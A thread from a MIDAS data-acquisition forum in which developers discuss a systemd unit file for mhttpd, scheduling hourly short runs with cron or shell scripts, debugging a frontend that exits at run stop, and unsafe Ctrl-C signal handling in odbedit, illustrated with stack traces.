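systemctl enable mhttpd
systemctl start mhttpd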
                         Reply  13 Mar 2019, Konstantin Olchanski, Forum, systemd unit file for mhttpd 
> > Can you post your systemd unit file to this elog, others may find it useful.

Thank you very much!

Note: the user name "neo" and the home directory are hardwired into the unit file. Also,
it runs after "network.target"; this may be too early - it should run after nis and autofs
have started (and made home directories accessible). (not sure what systemd target
that is).

K.O.

> 
> [Unit]
> Description=MIDAS data acquisition system
> After=network.target
> StartLimitIntervalSec=0
> 
> [Service]
> Type=simple
> Restart=always
> RestartSec=3
> User=neo
> ExecStart=/opt/midas/bin/mhttpd -e WAGASCI --http 8081 --https 8444
> Environment="MIDASSYS=/opt/midas" "MIDAS_EXPTAB=/home/neo/Code/WAGASCI/MIDAS/online/exptab" "MIDAS_EXPT_NAME=WAGASCI" "SVN_EDITOR=emacs -nw" "GIT_EDITOR=emacs -nw"
> PassEnvironment=MIDASSYS MIDAS_EXPTAB MIDAS_EXPT_NAME SVN_EDITOR GIT_EDITOR
> 
> [Install]
> WantedBy=multi-user.target
                            Reply  13 Mar 2019, Pintaudi Giorgio, Forum, systemd unit file for mhttpd 
> Note: user name "neo" and home directory is hardwired into the unit file. Also
> it runs after "network.target", this may be too early, it should run after nis and autofs
> have started (and made home directories accessible). (not sure what systemd target
> that is).

Thank you very much for the comments!

My home directory is hardwired because it is not straightforward to add environment variables into 
systemd units. Actually, I install MIDAS through a bash shell script that automatically generates 
the unit file during installation. So, for another user who would use my script, the correct path 
in the unit file would be generated at installation time. Another option would be to create an 
environment file and then feed it to the unit file (EnvironmentFile directive) as explained here: 
https://coreos.com/os/docs/latest/using-environment-variables-in-systemd-units.html
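For example, something like this (the file path and its contents are just placeholders):

# /etc/default/midas
MIDASSYS=/opt/midas
MIDAS_EXPTAB=<path/to/your/exptab>
MIDAS_EXPT_NAME=<nameofyourexperiment>

and in the unit file, instead of the Environment= line:

EnvironmentFile=/etc/default/midas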

For the autofs, thank you for the hint. I have modified the unit file accordingly.

As far as NIS is concerned, I am sorry but I don't know how it is used by MIDAS. Actually, I don't 
even have it installed on my machine. Anyway, I have modified the unit file accordingly (but I 
haven't tested with NIS installed).

The modified unit file is this:

[Unit]
Description=MIDAS data acquisition system
After=network.target rpcbind.target ypbind.target
StartLimitIntervalSec=0
RequiresMountsFor=%h

[Service]
Type=simple
Restart=always
RestartSec=3
User=neo
ExecStart=/opt/midas/bin/mhttpd -e <nameofyourexperiment> --http <yourhttpport> --https <yourhttpsport>
Environment="MIDASSYS=/opt/midas" "MIDAS_EXPTAB=<path/to/your/exptab>" "MIDAS_EXPT_NAME=<nameofyourexperiment>" "SVN_EDITOR=emacs -nw" "GIT_EDITOR=emacs -nw"
PassEnvironment=MIDASSYS MIDAS_EXPTAB MIDAS_EXPT_NAME SVN_EDITOR GIT_EDITOR

[Install]
WantedBy=multi-user.target
                               Reply  14 Mar 2019, Konstantin Olchanski, Forum, systemd unit file for mhttpd 
> As far as NIS is concerned, I am sorry but I don't know how it is used by MIDAS.

NIS is traditionally used together with autofs to form clusters of UNIX/Linux machines. NIS is a database
of user names, passwords, home directories, NFS (autofs) mount points and NFS exports. autofs would
read all its configuration from the NIS database.

So the correct boot sequence in most cases would be like this:
hardware init -> network init -> nis -> autofs -> users can login -> start midas (mhttpd) from cron @reboot or similar.

(In organizations that have a dedicated staff of IT sysadmins, you would see LDAP instead of NIS).

K.O.
Entry  11 Mar 2019, Francesco Renga, Forum, Run length 
Dear all,
        I need to implement a DAQ sequence where a short run (100 events, which takes a couple of 
minutes) is taken every hour, with a long run in between two short runs. In the sequencer, I can do:

LOOP infinite

.... some ODB settings ....
     TRANSITION START
     WAIT events 100
     TRANSITION STOP

.... some ODB settings ....
     TRANSITION START
     WAIT seconds 3600
     TRANSITION STOP

ENDLOOP


I have two questions: 

- for the long run, I want to write on disk only a maximum number of events. I think I can suppress 
the event polling in the frontend, with an ODB query of the number of collected events. I'm 
wondering if there is a smarter way to do that. It is also ok if the run is stopped after a maximum 
number of events, but the subsequent short run should still start exactly after 1h from the previous 
short run. 

- with the script above, the real time lapse between the start of two short runs would depend on 
the duration of the short run itself. Is there a way to start the short run exactly 1 h after the starting 
of the previous short run?

Thank you in advance for your help,
              Francesco
    Reply  12 Mar 2019, Stefan Ritt, Forum, Run length 
> Is there a way to start the short run exactly 1 h after the starting 
> of the previous short run?

This is not possible with the current sequencer.
    Reply  12 Mar 2019, Pierre Gorel, Forum, Run length 
> 
> .... some ODB settings ....
>      TRANSITION START
>      WAIT events 100
>      TRANSITION STOP
> I have two questions: 
> 
> - for the long run, I want to write on disk only a maximum number of events. I think I can suppress 
> the event polling in the frontend, with an ODB query of the number of collected events. I'm 
> wondering if there is a smarter way to do that. It is also ok if the run is stopped after a maximum 
> number of events, but the subsequent short run should still start exactly after 1h from the previous 
> short run. 

I don't know about a way to give you an exact number of events (maybe /Logger/Run duration). 

I personally use 
    WAIT ODBValue,"/Equipment/DTM/Statistics/Events sent",>,100

Where DTM is the frontend of my trigger. Because of the lag in the run stop, the run will always exceed the limit by a few
seconds times the event rate.

Hope it helps
    Reply  13 Mar 2019, Konstantin Olchanski, Forum, Run length 
I did not quite understand your desired sequence. Is this what you want:

- at 1pm
- start a run
- record 100 events
- end the run
- (this will be, say, 1:15pm)
- start a run
- at 2pm
- end the run
- start a run
- record 100 events
- ad infinitum

There are 2 difficulties with this:

1) If you want your cycle to be exactly 1 hour, you need to use cron or something similar - if you just "start; sleep 3600; stop", 
your cycle will be slightly longer than 1 hour because starting and stopping runs takes some time to complete.

2) if you want your "100 event" run to start exactly precisely on the hour, you need to stop the previous run a few 
minutes/seconds before the hour to avoid the "run stop" delay.

Instead of using the sequencer, I would use a shell script (run it from crontab to avoid problem (1))

#!/bin/sh
mtransition stop # stop the previous long run
odbedit -c 'set "/logger/channels/0/settings/event limit" 100'
odbedit -c 'set "/logger/auto restart" y'
mtransition start # start the short run
# end

In your frontend end_of_run() function, add this:
odb set "/logger/channels/0/settings/event limit" 0
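In C, that would be something along these lines (a sketch only, assuming the standard mfe.c frontend; check the actual type of the "Event limit" key in your ODB - depending on the midas version it may be DOUBLE or DWORD):

#include "midas.h"

INT end_of_run(INT run_number, char *error)
{
   HNDLE hDB;
   double limit = 0; /* assumes the key is a DOUBLE; adjust if yours is DWORD */

   cm_get_experiment_database(&hDB, NULL);
   db_set_value(hDB, 0, "/Logger/Channels/0/Settings/Event limit",
                &limit, sizeof(limit), 1, TID_DOUBLE);
   return SUCCESS;
}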

This will produce the following sequence:

- script will stop previous long run
- set event limit to 100, start the "100 events" run
- logger will stop at 100 events, call your frontend end_of_run(), set event limit to 0
- logger auto restart will start a new run, event limit is now 0, this is your long run
- on the hour, cron runs your script, cycle repeats from the top.

Instead of cron, your can use a looper script. Note that you must run
the main script in the background (note the "&") to avoid problem (1).

#!/bin/sh
# looper script
while true; do
   main_script &
   sleep 3600
done
# end

To stop the sequence, kill the looper script.

K.O.


> Dear all,
>         I need to implement a DAQ sequence where a short run (100 events, which takes a couple of 
> minutes) is taken every hour, with a long run in between two short runs. In the sequencer, I can do:
> 
> LOOP infinite
> 
> .... some ODB settings ....
>      TRANSITION START
>      WAIT events 100
>      TRANSITION STOP
> 
> .... some ODB settings ....
>      TRANSITION START
>      WAIT seconds 3600
>      TRANSITION STOP
> 
> ENDLOOP
> 
> 
> I have two questions: 
> 
> - for the long run, I want to write on disk only a maximum number of events. I think I can suppress 
> the event polling in the frontend, with an ODB query of the number of collected events. I'm 
> wondering if there is a smarter way to do that. It is also ok if the run is stopped after a maximum 
> number of events, but the subsequent short run should still start exactly after 1h from the previous 
> short run. 
> 
> - with the script above, the real time lapse between the start of two short runs would depend on 
> the duration of the short run itself. Is there a way to start the short run exactly 1 h after the starting 
> of the previous short run?
> 
> Thank you in advance for your help,
>               Francesco
Entry  12 Mar 2019, Francesco Renga, Forum, Problem stopping every second run 
Dear all,
         I'm running a DAQ frontend and it works well if one single run is
taken. If I try to take a second run right after, the run is performed but, when
stopping it, I get the error messages below. Any hint?

Thank you for your help,
      Francesco


11:42:24.012 2019/03/12 [mhttpd,ERROR] [midas.c:6022:cm_shutdown,ERROR] Killing
and Deleting client 'cygnus_daq' pid 12472

11:42:24.012 2019/03/12 [mhttpd,ERROR] [midas.c:6019:cm_shutdown,ERROR] Cannot
connect to client 'cygnus_daq' on host 'localhost', port 46341

11:42:24.012 2019/03/12 [mhttpd,ERROR] [midas.c:9539:rpc_client_connect,ERROR]
cannot connect to host "localhost", port 46341: connect() returned -1, errno 111
(Connection refused)

11:42:24.012 2019/03/12 [mhttpd,ERROR] [midas.c:10821:rpc_client_call,ERROR]
call to "cygnus_daq" on "localhost" RPC "rc_transition": error,
ss_recv_net_command() status 411

11:42:24.012 2019/03/12 [mhttpd,ERROR] [system.c:4715:ss_recv_net_command,ERROR]
error receiving network command header, see messages

11:42:24.011 2019/03/12 [mhttpd,ERROR] [system.c:4661:recv_tcp2,ERROR]
unexpected connection closure

11:42:23.994 2019/03/12 [cygnus_daq,ERROR] [midas.c:1951:,ERROR]
cm_disconnect_experiment not called at end of program
    Reply  13 Mar 2019, Konstantin Olchanski, Forum, Problem stopping every second run 
>          I'm running a DAQ frontend and it works well if one single run is
> taken. If I try to take a second run right after, the run is performed but, when
> stopping it, I get the error messages below. Any hint?

Sure. I will read the error messages for you: note that they come in reverse time order - oldest message is at the bottom. I 
will reverse them in my reading:

> 11:42:23.994 2019/03/12 [cygnus_daq,ERROR] [midas.c:1951:,ERROR]
> cm_disconnect_experiment not called at end of program

your frontend has exited (this error message is printed by the atexit() code, so you did not crash but called exit(), 
somehow).

> 11:42:24.011 2019/03/12 [mhttpd,ERROR] [system.c:4661:recv_tcp2,ERROR]
> unexpected connection closure

mhttpd reports that the socket connection to your frontend has closed (because the frontend stopped, closing all its
sockets)

> 11:42:24.012 2019/03/12 [mhttpd,ERROR] [system.c:4715:ss_recv_net_command,ERROR]
> error receiving network command header, see messages

the next layer of the mhttpd network code reports the same error again

> 11:42:24.012 2019/03/12 [mhttpd,ERROR] [midas.c:10821:rpc_client_call,ERROR]
> call to "cygnus_daq" on "localhost" RPC "rc_transition": error,
> ss_recv_net_command() status 411

the next layer of the mhttpd network code reports the same error again; now we see that it was trying
to execute a "run start" (or "stop") RPC call to your frontend. But your frontend unexpectedly
shut down (instead of replying to the RPC).

The next messages after that show mhttpd deciding that your frontend is faulty (it does not respond to the RPC correctly) and trying to 
shut it down, but failing (cannot connect, etc). The last message is mhttpd cleaning up your frontend from ODB (because the 
frontend did not clean up after itself - it did not call cm_disconnect_experiment(), per the very first error message).


So this is what we see from the midas messages - your frontend unexpectedly exited during the run transition. If, as you
say, the run was stopping at the time, the exit would have happened in your end_of_run() function.

To debug this, I would do:

a) put some printf() statements in end_of_run() and see what they say during the crash
b) run the frontend inside the debugger, you may need to set a breakpoint on exit() or something like that.
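For (b), something like this should work (the binary name is taken from your error messages; add whatever command line arguments your frontend needs):

gdb ./cygnus_daq
(gdb) break exit
(gdb) run
... reproduce the run stop; when the breakpoint fires ...
(gdb) backtrace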


Good luck,
K.O.





> 
> Thank you for your help,
>       Francesco
> 
> 
> 11:42:24.012 2019/03/12 [mhttpd,ERROR] [midas.c:6022:cm_shutdown,ERROR] Killing
> and Deleting client 'cygnus_daq' pid 12472
> 
> 11:42:24.012 2019/03/12 [mhttpd,ERROR] [midas.c:6019:cm_shutdown,ERROR] Cannot
> connect to client 'cygnus_daq' on host 'localhost', port 46341
> 
> 11:42:24.012 2019/03/12 [mhttpd,ERROR] [midas.c:9539:rpc_client_connect,ERROR]
> cannot connect to host "localhost", port 46341: connect() returned -1, errno 111
> (Connection refused)
> 
> 11:42:24.012 2019/03/12 [mhttpd,ERROR] [midas.c:10821:rpc_client_call,ERROR]
> call to "cygnus_daq" on "localhost" RPC "rc_transition": error,
> ss_recv_net_command() status 411
> 
> 11:42:24.012 2019/03/12 [mhttpd,ERROR] [system.c:4715:ss_recv_net_command,ERROR]
> error receiving network command header, see messages
> 
> 11:42:24.011 2019/03/12 [mhttpd,ERROR] [system.c:4661:recv_tcp2,ERROR]
> unexpected connection closure
> 
> 11:42:23.994 2019/03/12 [cygnus_daq,ERROR] [midas.c:1951:,ERROR]
> cm_disconnect_experiment not called at end of program
Entry  20 Feb 2019, Konstantin Olchanski, Info, odb needs protection against ctrl-c 
Even with the cm_watchdog signal removed, some trouble from UNIX signals remains.

This time, when one presses Ctrl-C at the wrong time, the Ctrl-C signal handler will run at the wrong time
and strange things will happen (including odb corruption).

In the captured stack trace, I pressed Ctrl-C right when odbedit was inside db_lock_database(). I had to make special
arrangements to make it happen, but I have seen it happen in normal use when running experiments.

K.O.

(lldb) bt
* thread #1, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
  * frame #0: 0x00007fff6c2ceb66 libsystem_kernel.dylib`__pthread_kill + 10
    frame #1: 0x00007fff6c499080 libsystem_pthread.dylib`pthread_kill + 333
    frame #2: 0x00007fff6c22a1ae libsystem_c.dylib`abort + 127
    frame #3: 0x00000001057ccf95 odbedit`db_lock_database(hDB=<unavailable>) at odb.c:2048 [opt]
    frame #4: 0x00000001057aed9d odbedit`cm_delete_client_info(hDB=1, pid=46856) at midas.c:1702 [opt]
    frame #5: 0x00000001057b08fe odbedit`cm_disconnect_experiment at midas.c:2704 [opt]
    frame #6: 0x00000001057a8231 odbedit`ctrlc_odbedit(i=<unavailable>) at odbedit.cxx:2863 [opt]
    frame #7: 0x00007fff6c48cf5a libsystem_platform.dylib`_sigtramp + 26
    frame #8: 0x00007fff6c2ced83 libsystem_kernel.dylib`__semwait_signal + 11
    frame #9: 0x00007fff6c249724 libsystem_c.dylib`nanosleep + 199
    frame #10: 0x00007fff6c249586 libsystem_c.dylib`sleep + 41
    frame #11: 0x00000001057cce6b odbedit`db_lock_database(hDB=<unavailable>) at odb.c:2057 [opt]
    frame #12: 0x00000001057e129a odbedit`db_get_record_size(hDB=1, hKey=141848, align=8, buf_size=0x00007ffeea44c14c) at odb.c:10232 [opt]
    frame #13: 0x00000001057e1b58 odbedit`db_get_record1(hDB=1, hKey=141848, data=0x00007ffeea44c320, buf_size=0x00007ffeea44c2a8, align=0, rec_str="[.]\nWrite system message = BOOL : 
y\nWrite Elog message = BOOL : n\nSystem message interval = INT : 60\nSystem message last = DWORD : 0\nExecute command = STRING : [256] \nExecute interval = INT : 0\nExecute last = DWORD : 
0\nStop run = BOOL : n\nDisplay BGColor = STRING : [32] red\nDisplay FGColor = STRING : [32] black\n\n") at odb.c:10390 [opt]
    frame #14: 0x00000001057f1de3 odbedit`al_trigger_class(alarm_class="Warning", alarm_message="This is an example alarm", first=YES) at alarm.c:389 [opt]
    frame #15: 0x00000001057f19e8 odbedit`al_trigger_alarm(alarm_name="Example alarm", alarm_message="This is an example alarm", default_class="Warning", cond_str="", type=<unavailable>) at 
alarm.c:310 [opt]
    frame #16: 0x00000001057f2c4e odbedit`al_check at alarm.c:655 [opt]
    frame #17: 0x00000001057b9f88 odbedit`cm_periodic_tasks at midas.c:5066 [opt]
    frame #18: 0x00000001057ba26d odbedit`cm_yield(millisec=100) at midas.c:5137 [opt]
    frame #19: 0x00000001057a30b8 odbedit`cmd_idle() at odbedit.cxx:1238 [opt]
    frame #20: 0x00000001057a92df odbedit`cmd_edit(prompt="[local:javascript1:S]/>", cmd=<unavailable>, dir=(odbedit`cmd_dir(char*, int*) at odbedit.cxx:705), idle=(odbedit`cmd_idle() at 
odbedit.cxx:1233))(char*, int*), int (*)()) at cmdedit.cxx:235 [opt]
    frame #21: 0x00000001057a3863 odbedit`command_loop(host_name="", exp_name="javascript1", cmd="", start_dir=<unavailable>) at odbedit.cxx:1435 [opt]
    frame #22: 0x00000001057a8664 odbedit`main(argc=1, argv=<unavailable>) at odbedit.cxx:2997 [opt]
    frame #23: 0x00007fff6c17e015 libdyld.dylib`start + 1
    Reply  20 Feb 2019, Stefan Ritt, Info, odb needs protection against ctrl-c 
Not sure if you realized, but there is a two-stage Ctrl-C handling inside midas. The first time you hit ctrl-c, the handler just sets a flag for the main event loop, so that the program can gracefully exit without trouble. This is 
done inside cm_ctrlc_handler(), which sets _ctrlc_pressed true if called. Then cm_yield() tests this flag and returns RPC_SHUTDOWN if so. I agree this is not very obvious; maybe we should return a more appropriate status. So the 
main loop must check the return status of cm_yield() and break if it's RPC_SHUTDOWN. The frontend framework mfe.c does this for example in

 while (status != RPC_SHUTDOWN && status != SS_ABORT);

Any user-written program should do the same (well, probably this is nowhere documented).
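i.e. something like this (a sketch of the pattern only, not code from any specific program):

int status;
do {
   status = cm_yield(100);   /* returns RPC_SHUTDOWN after ctrl-c */
   /* ... periodic user code ... */
} while (status != RPC_SHUTDOWN && status != SS_ABORT);
cm_disconnect_experiment();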

Now when the program does not exit (e.g. if it's in an infinite loop), then the second ctrl-c creates a hard abort and terminates the program non-gracefully, which as you noticed can lead to undesired results. All the 
semaphores (at least when I implemented it) had a SEM_UNDO flag when obtaining ownership. This means that if the semaphore is locked and the process that owns it terminates (even with a hard kill), then the semaphore 
is released by the OS. This way a crashed program cannot keep the ODB locked, for example. Not sure whether, with all your modifications to the semaphore calls, this functionality is still guaranteed.

Stefan

> Even with the cm_watchdog signal removed, some trouble from UNIX signals remains.
> 
> This time, when one presses Ctrl-C at the wrong time, the Ctrl-C signal handler will run at the wrong time
> and strange things will happen (including odb corruption).
> 
> In the captured stack trace, I pressed Ctrl-C right when odbedit was inside db_lock_database(). I had to make special
> arrangements to make it happen, but I have seen it happen in normal use when running experiments.
> 
> K.O.
> 
> (lldb) bt
> * thread #1, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
>   * frame #0: 0x00007fff6c2ceb66 libsystem_kernel.dylib`__pthread_kill + 10
>     frame #1: 0x00007fff6c499080 libsystem_pthread.dylib`pthread_kill + 333
>     frame #2: 0x00007fff6c22a1ae libsystem_c.dylib`abort + 127
>     frame #3: 0x00000001057ccf95 odbedit`db_lock_database(hDB=<unavailable>) at odb.c:2048 [opt]
>     frame #4: 0x00000001057aed9d odbedit`cm_delete_client_info(hDB=1, pid=46856) at midas.c:1702 [opt]
>     frame #5: 0x00000001057b08fe odbedit`cm_disconnect_experiment at midas.c:2704 [opt]
>     frame #6: 0x00000001057a8231 odbedit`ctrlc_odbedit(i=<unavailable>) at odbedit.cxx:2863 [opt]
>     frame #7: 0x00007fff6c48cf5a libsystem_platform.dylib`_sigtramp + 26
>     frame #8: 0x00007fff6c2ced83 libsystem_kernel.dylib`__semwait_signal + 11
>     frame #9: 0x00007fff6c249724 libsystem_c.dylib`nanosleep + 199
>     frame #10: 0x00007fff6c249586 libsystem_c.dylib`sleep + 41
>     frame #11: 0x00000001057cce6b odbedit`db_lock_database(hDB=<unavailable>) at odb.c:2057 [opt]
>     frame #12: 0x00000001057e129a odbedit`db_get_record_size(hDB=1, hKey=141848, align=8, buf_size=0x00007ffeea44c14c) at odb.c:10232 [opt]
>     frame #13: 0x00000001057e1b58 odbedit`db_get_record1(hDB=1, hKey=141848, data=0x00007ffeea44c320, buf_size=0x00007ffeea44c2a8, align=0, rec_str="[.]\nWrite system message = BOOL : 
> y\nWrite Elog message = BOOL : n\nSystem message interval = INT : 60\nSystem message last = DWORD : 0\nExecute command = STRING : [256] \nExecute interval = INT : 0\nExecute last = DWORD : 
> 0\nStop run = BOOL : n\nDisplay BGColor = STRING : [32] red\nDisplay FGColor = STRING : [32] black\n\n") at odb.c:10390 [opt]
>     frame #14: 0x00000001057f1de3 odbedit`al_trigger_class(alarm_class="Warning", alarm_message="This is an example alarm", first=YES) at alarm.c:389 [opt]
>     frame #15: 0x00000001057f19e8 odbedit`al_trigger_alarm(alarm_name="Example alarm", alarm_message="This is an example alarm", default_class="Warning", cond_str="", type=<unavailable>) at 
> alarm.c:310 [opt]
>     frame #16: 0x00000001057f2c4e odbedit`al_check at alarm.c:655 [opt]
>     frame #17: 0x00000001057b9f88 odbedit`cm_periodic_tasks at midas.c:5066 [opt]
>     frame #18: 0x00000001057ba26d odbedit`cm_yield(millisec=100) at midas.c:5137 [opt]
>     frame #19: 0x00000001057a30b8 odbedit`cmd_idle() at odbedit.cxx:1238 [opt]
>     frame #20: 0x00000001057a92df odbedit`cmd_edit(prompt="[local:javascript1:S]/>", cmd=<unavailable>, dir=(odbedit`cmd_dir(char*, int*) at odbedit.cxx:705), idle=(odbedit`cmd_idle() at 
> odbedit.cxx:1233))(char*, int*), int (*)()) at cmdedit.cxx:235 [opt]
>     frame #21: 0x00000001057a3863 odbedit`command_loop(host_name="", exp_name="javascript1", cmd="", start_dir=<unavailable>) at odbedit.cxx:1435 [opt]
>     frame #22: 0x00000001057a8664 odbedit`main(argc=1, argv=<unavailable>) at odbedit.cxx:2997 [opt]
>     frame #23: 0x00007fff6c17e015 libdyld.dylib`start + 1
       Reply  20 Feb 2019, Konstantin Olchanski, Info, odb needs protection against ctrl-c 
> Not sure if you realized, but there is a two-stage Ctrl-C handling inside midas.

Hmm... I am looking at the ctrl-c handler inside odbedit.

Yes, and the original bug report is against odbedit - press of ctrl-c in odbedit corrupts odb,
see stack trace in https://bitbucket.org/tmidas/midas/issues/99

So maybe only the odbedit ctrl-c handler is defective...

I will take a look at what the other ctrl-c handler does.

Safest is probably to call exit() without calling cm_disconnect_experiment().

From the ctrl-c handler, if we call cm_disconnect_experiment() -
- if we hold odb locked, we deadlock (after I remove the recursive mutex) or corrupt odb (if we run from inside db_create or db_set_data).
- if we run from inside db_lock/unlock, we abort() (with my newly added protection) or explode (if we run from inside mprotect(), like in the stack trace in the bug report)

I would say that, from a signal handler, the only safe things to do are to set a flag, or to call abort()/exit().

exit() is not super safe because the user may have attached some code to it that may access odb. (our
default atexit() handler just prints an error message).

K.O.


> The first time you hit ctrl-c, the handler just sets a flag for the main event loop, so that the program can gracefully exit without trouble. This is 
> done inside cm_ctrlc_handler(), which sets _ctrlc_pressed true if called. Then cm_yield() tests this flag and returns RPC_SHUTDOWN if so. I agree not very obvious, maybe we should return a more appropriate status. So the 
> main loop must check the return status of cm_yield() and break if it's RPC_SHUTDOWN. The frontend framework mfe.c does this for example in
> 
>  while (status != RPC_SHUTDOWN && status != SS_ABORT);
> 
> Any use-written program should do the same (well, probably this is nowhere documented).
> 
> Now when the program does not exit (e.g. if it's in an infinite loop), then the second ctrl-c creates a hard abort and terminates the program non-gracefully, which as you noticed can lead to undesired results. All the 
> semaphores (at least when I implemented it) had a SEM_UNDO flag when obtaining ownership. This means that if the semaphore is locked and the process who owns it terminates (even with a hard kill), then the semaphore 
> is released by the OS. This way a crashed program cannot keep the ODB locked for example. Not sure that with all your modifications in the semaphore calls this functionality is still guaranteed.
> 
> Stefan
> 
> > Even with the cm_watchdog signal removed, some trouble from UNIX signals remains.
> > 
> > This time, when one presses Ctrl-C at the wrong time, the Ctrl-C signal handler will run at the wrong time
> > and strange things will happen (including odb corruption).
> > 
> > In the captured stack trace, I pressed Ctrl-C right when odbedit was inside db_lock_database(). I had to make special
> > arrangements to make it happen, but I have seen it happen in normal use when running experiments.
> > 
> > K.O.
> > 
> > (lldb) bt
> > * thread #1, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
> >   * frame #0: 0x00007fff6c2ceb66 libsystem_kernel.dylib`__pthread_kill + 10
> >     frame #1: 0x00007fff6c499080 libsystem_pthread.dylib`pthread_kill + 333
> >     frame #2: 0x00007fff6c22a1ae libsystem_c.dylib`abort + 127
> >     frame #3: 0x00000001057ccf95 odbedit`db_lock_database(hDB=<unavailable>) at odb.c:2048 [opt]
> >     frame #4: 0x00000001057aed9d odbedit`cm_delete_client_info(hDB=1, pid=46856) at midas.c:1702 [opt]
> >     frame #5: 0x00000001057b08fe odbedit`cm_disconnect_experiment at midas.c:2704 [opt]
> >     frame #6: 0x00000001057a8231 odbedit`ctrlc_odbedit(i=<unavailable>) at odbedit.cxx:2863 [opt]
> >     frame #7: 0x00007fff6c48cf5a libsystem_platform.dylib`_sigtramp + 26
> >     frame #8: 0x00007fff6c2ced83 libsystem_kernel.dylib`__semwait_signal + 11
> >     frame #9: 0x00007fff6c249724 libsystem_c.dylib`nanosleep + 199
> >     frame #10: 0x00007fff6c249586 libsystem_c.dylib`sleep + 41
> >     frame #11: 0x00000001057cce6b odbedit`db_lock_database(hDB=<unavailable>) at odb.c:2057 [opt]
> >     frame #12: 0x00000001057e129a odbedit`db_get_record_size(hDB=1, hKey=141848, align=8, buf_size=0x00007ffeea44c14c) at odb.c:10232 [opt]
> >     frame #13: 0x00000001057e1b58 odbedit`db_get_record1(hDB=1, hKey=141848, data=0x00007ffeea44c320, buf_size=0x00007ffeea44c2a8, align=0, rec_str="[.]\nWrite system message = BOOL : 
> > y\nWrite Elog message = BOOL : n\nSystem message interval = INT : 60\nSystem message last = DWORD : 0\nExecute command = STRING : [256] \nExecute interval = INT : 0\nExecute last = DWORD : 
> > 0\nStop run = BOOL : n\nDisplay BGColor = STRING : [32] red\nDisplay FGColor = STRING : [32] black\n\n") at odb.c:10390 [opt]
> >     frame #14: 0x00000001057f1de3 odbedit`al_trigger_class(alarm_class="Warning", alarm_message="This is an example alarm", first=YES) at alarm.c:389 [opt]
> >     frame #15: 0x00000001057f19e8 odbedit`al_trigger_alarm(alarm_name="Example alarm", alarm_message="This is an example alarm", default_class="Warning", cond_str="", type=<unavailable>) at 
> > alarm.c:310 [opt]
> >     frame #16: 0x00000001057f2c4e odbedit`al_check at alarm.c:655 [opt]
> >     frame #17: 0x00000001057b9f88 odbedit`cm_periodic_tasks at midas.c:5066 [opt]
> >     frame #18: 0x00000001057ba26d odbedit`cm_yield(millisec=100) at midas.c:5137 [opt]
> >     frame #19: 0x00000001057a30b8 odbedit`cmd_idle() at odbedit.cxx:1238 [opt]
> >     frame #20: 0x00000001057a92df odbedit`cmd_edit(prompt="[local:javascript1:S]/>", cmd=<unavailable>, dir=(odbedit`cmd_dir(char*, int*) at odbedit.cxx:705), idle=(odbedit`cmd_idle() at 
> > odbedit.cxx:1233))(char*, int*), int (*)()) at cmdedit.cxx:235 [opt]
> >     frame #21: 0x00000001057a3863 odbedit`command_loop(host_name="", exp_name="javascript1", cmd="", start_dir=<unavailable>) at odbedit.cxx:1435 [opt]
> >     frame #22: 0x00000001057a8664 odbedit`main(argc=1, argv=<unavailable>) at odbedit.cxx:2997 [opt]
> >     frame #23: 0x00007fff6c17e015 libdyld.dylib`start + 1
          Reply  20 Feb 2019, Stefan Ritt, Info, odb needs protection against ctrl-c 
Have you read what I wrote? The current ctrl-c handler just sets the _ctrlc_pressed flag. It might be that some programs do not correctly interpret the return value of cm_yield(); certainly the frontend does it correctly. On the SECOND ctrl-c, the program gets 
(internally) hard aborted, equivalent to calling abort(). Not sure if the code works everywhere, I see now that cm_yield() should maybe return SS_ABORT like

if (_ctrlc_pressed)
  return SS_ABORT;

then command_loop will exit gracefully. Have to check mfe.c, mlogger.c etc. if they all check for SS_ABORT returned from cm_yield().

> > Not sure if you realized, but there is a two-stage Ctrl-C handling inside midas.
> 
> Hmm... I am looking at the ctrl-c handler inside odbedit.
> 
> Yes, and the original bug report is against odbedit - press of ctrl-c in odbedit corrupts odb,
> see stack trace in https://bitbucket.org/tmidas/midas/issues/99
> 
> So maybe only the odbedit ctrl-c handler is defective...
> 
> I will take a look at what the other ctrl-c handler does.
> 
> Safest is probably to call exit() without calling cm_disconnect_experiment().
> 
> From the ctrl-c handler, if we call cm_disconnect_experiment() -
> - if we hold odb locked, we deadlock (after I remove the recursive mutex) or corrupt odb (if we run form inside db_create or db_set_data).
> - if we run from inside db_lock/unlock, we abort() (with my newly added protection) or explode (if we run from inside mprotect(), like in the stack strace in the bug report)
> 
> I would say, from a signal handler, only safe things are - set a flag, or abort()/exit().
> 
> exit() is not super safe because the user may have attached some code to it that may access odb. (our
> default atexit() handler just prints an error message).
> 
> K.O.
> 
> 
> > The first time you hit ctrl-c, the handler just sets a flag for the main event loop, so that the program can gracefully exit without trouble. This is 
> > done inside cm_ctrlc_handler(), which sets _ctrlc_pressed true if called. Then cm_yield() tests this flag and returns RPC_SHUTDOWN if so. I agree not very obvious, maybe we should return a more appropriate status. So the 
> > main loop must check the return status of cm_yield() and break if it's RPC_SHUTDOWN. The frontend framework mfe.c does this for example in
> > 
> >  while (status != RPC_SHUTDOWN && status != SS_ABORT);
> > 
> > Any use-written program should do the same (well, probably this is nowhere documented).
> > 
> > Now when the program does not exit (e.g. if it's in an infinite loop), then the second ctrl-c creates a hard abort and terminates the program non-gracefully, which as you noticed can lead to undesired results. All the 
> > semaphores (at least when I implemented it) had a SEM_UNDO flag when obtaining ownership. This means that if the semaphore is locked and the process who owns it terminates (even with a hard kill), then the semaphore 
> > is released by the OS. This way a crashed program cannot keep the ODB locked for example. Not sure that with all your modifications in the semaphore calls this functionality is still guaranteed.
> > 
> > Stefan
> > 
> > > Even with the cm_watchdog signal removed, some trouble from UNIX signals remains.
> > > 
> > > This time, when one presses Ctrl-C at the wrong time, the Ctrl-C signal handler will run at the wrong time
> > > and strange things will happen (including odb corruption).
> > > 
> > > In the captured stack trace, I pressed Ctrl-C right when odbedit was inside db_lock_database(). I had to make special
> > > arrangements to make it happen, but I have seen it happen in normal use when running experiments.
> > > 
> > > K.O.
> > > 
> > > (lldb) bt
> > > * thread #1, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
> > >   * frame #0: 0x00007fff6c2ceb66 libsystem_kernel.dylib`__pthread_kill + 10
> > >     frame #1: 0x00007fff6c499080 libsystem_pthread.dylib`pthread_kill + 333
> > >     frame #2: 0x00007fff6c22a1ae libsystem_c.dylib`abort + 127
> > >     frame #3: 0x00000001057ccf95 odbedit`db_lock_database(hDB=<unavailable>) at odb.c:2048 [opt]
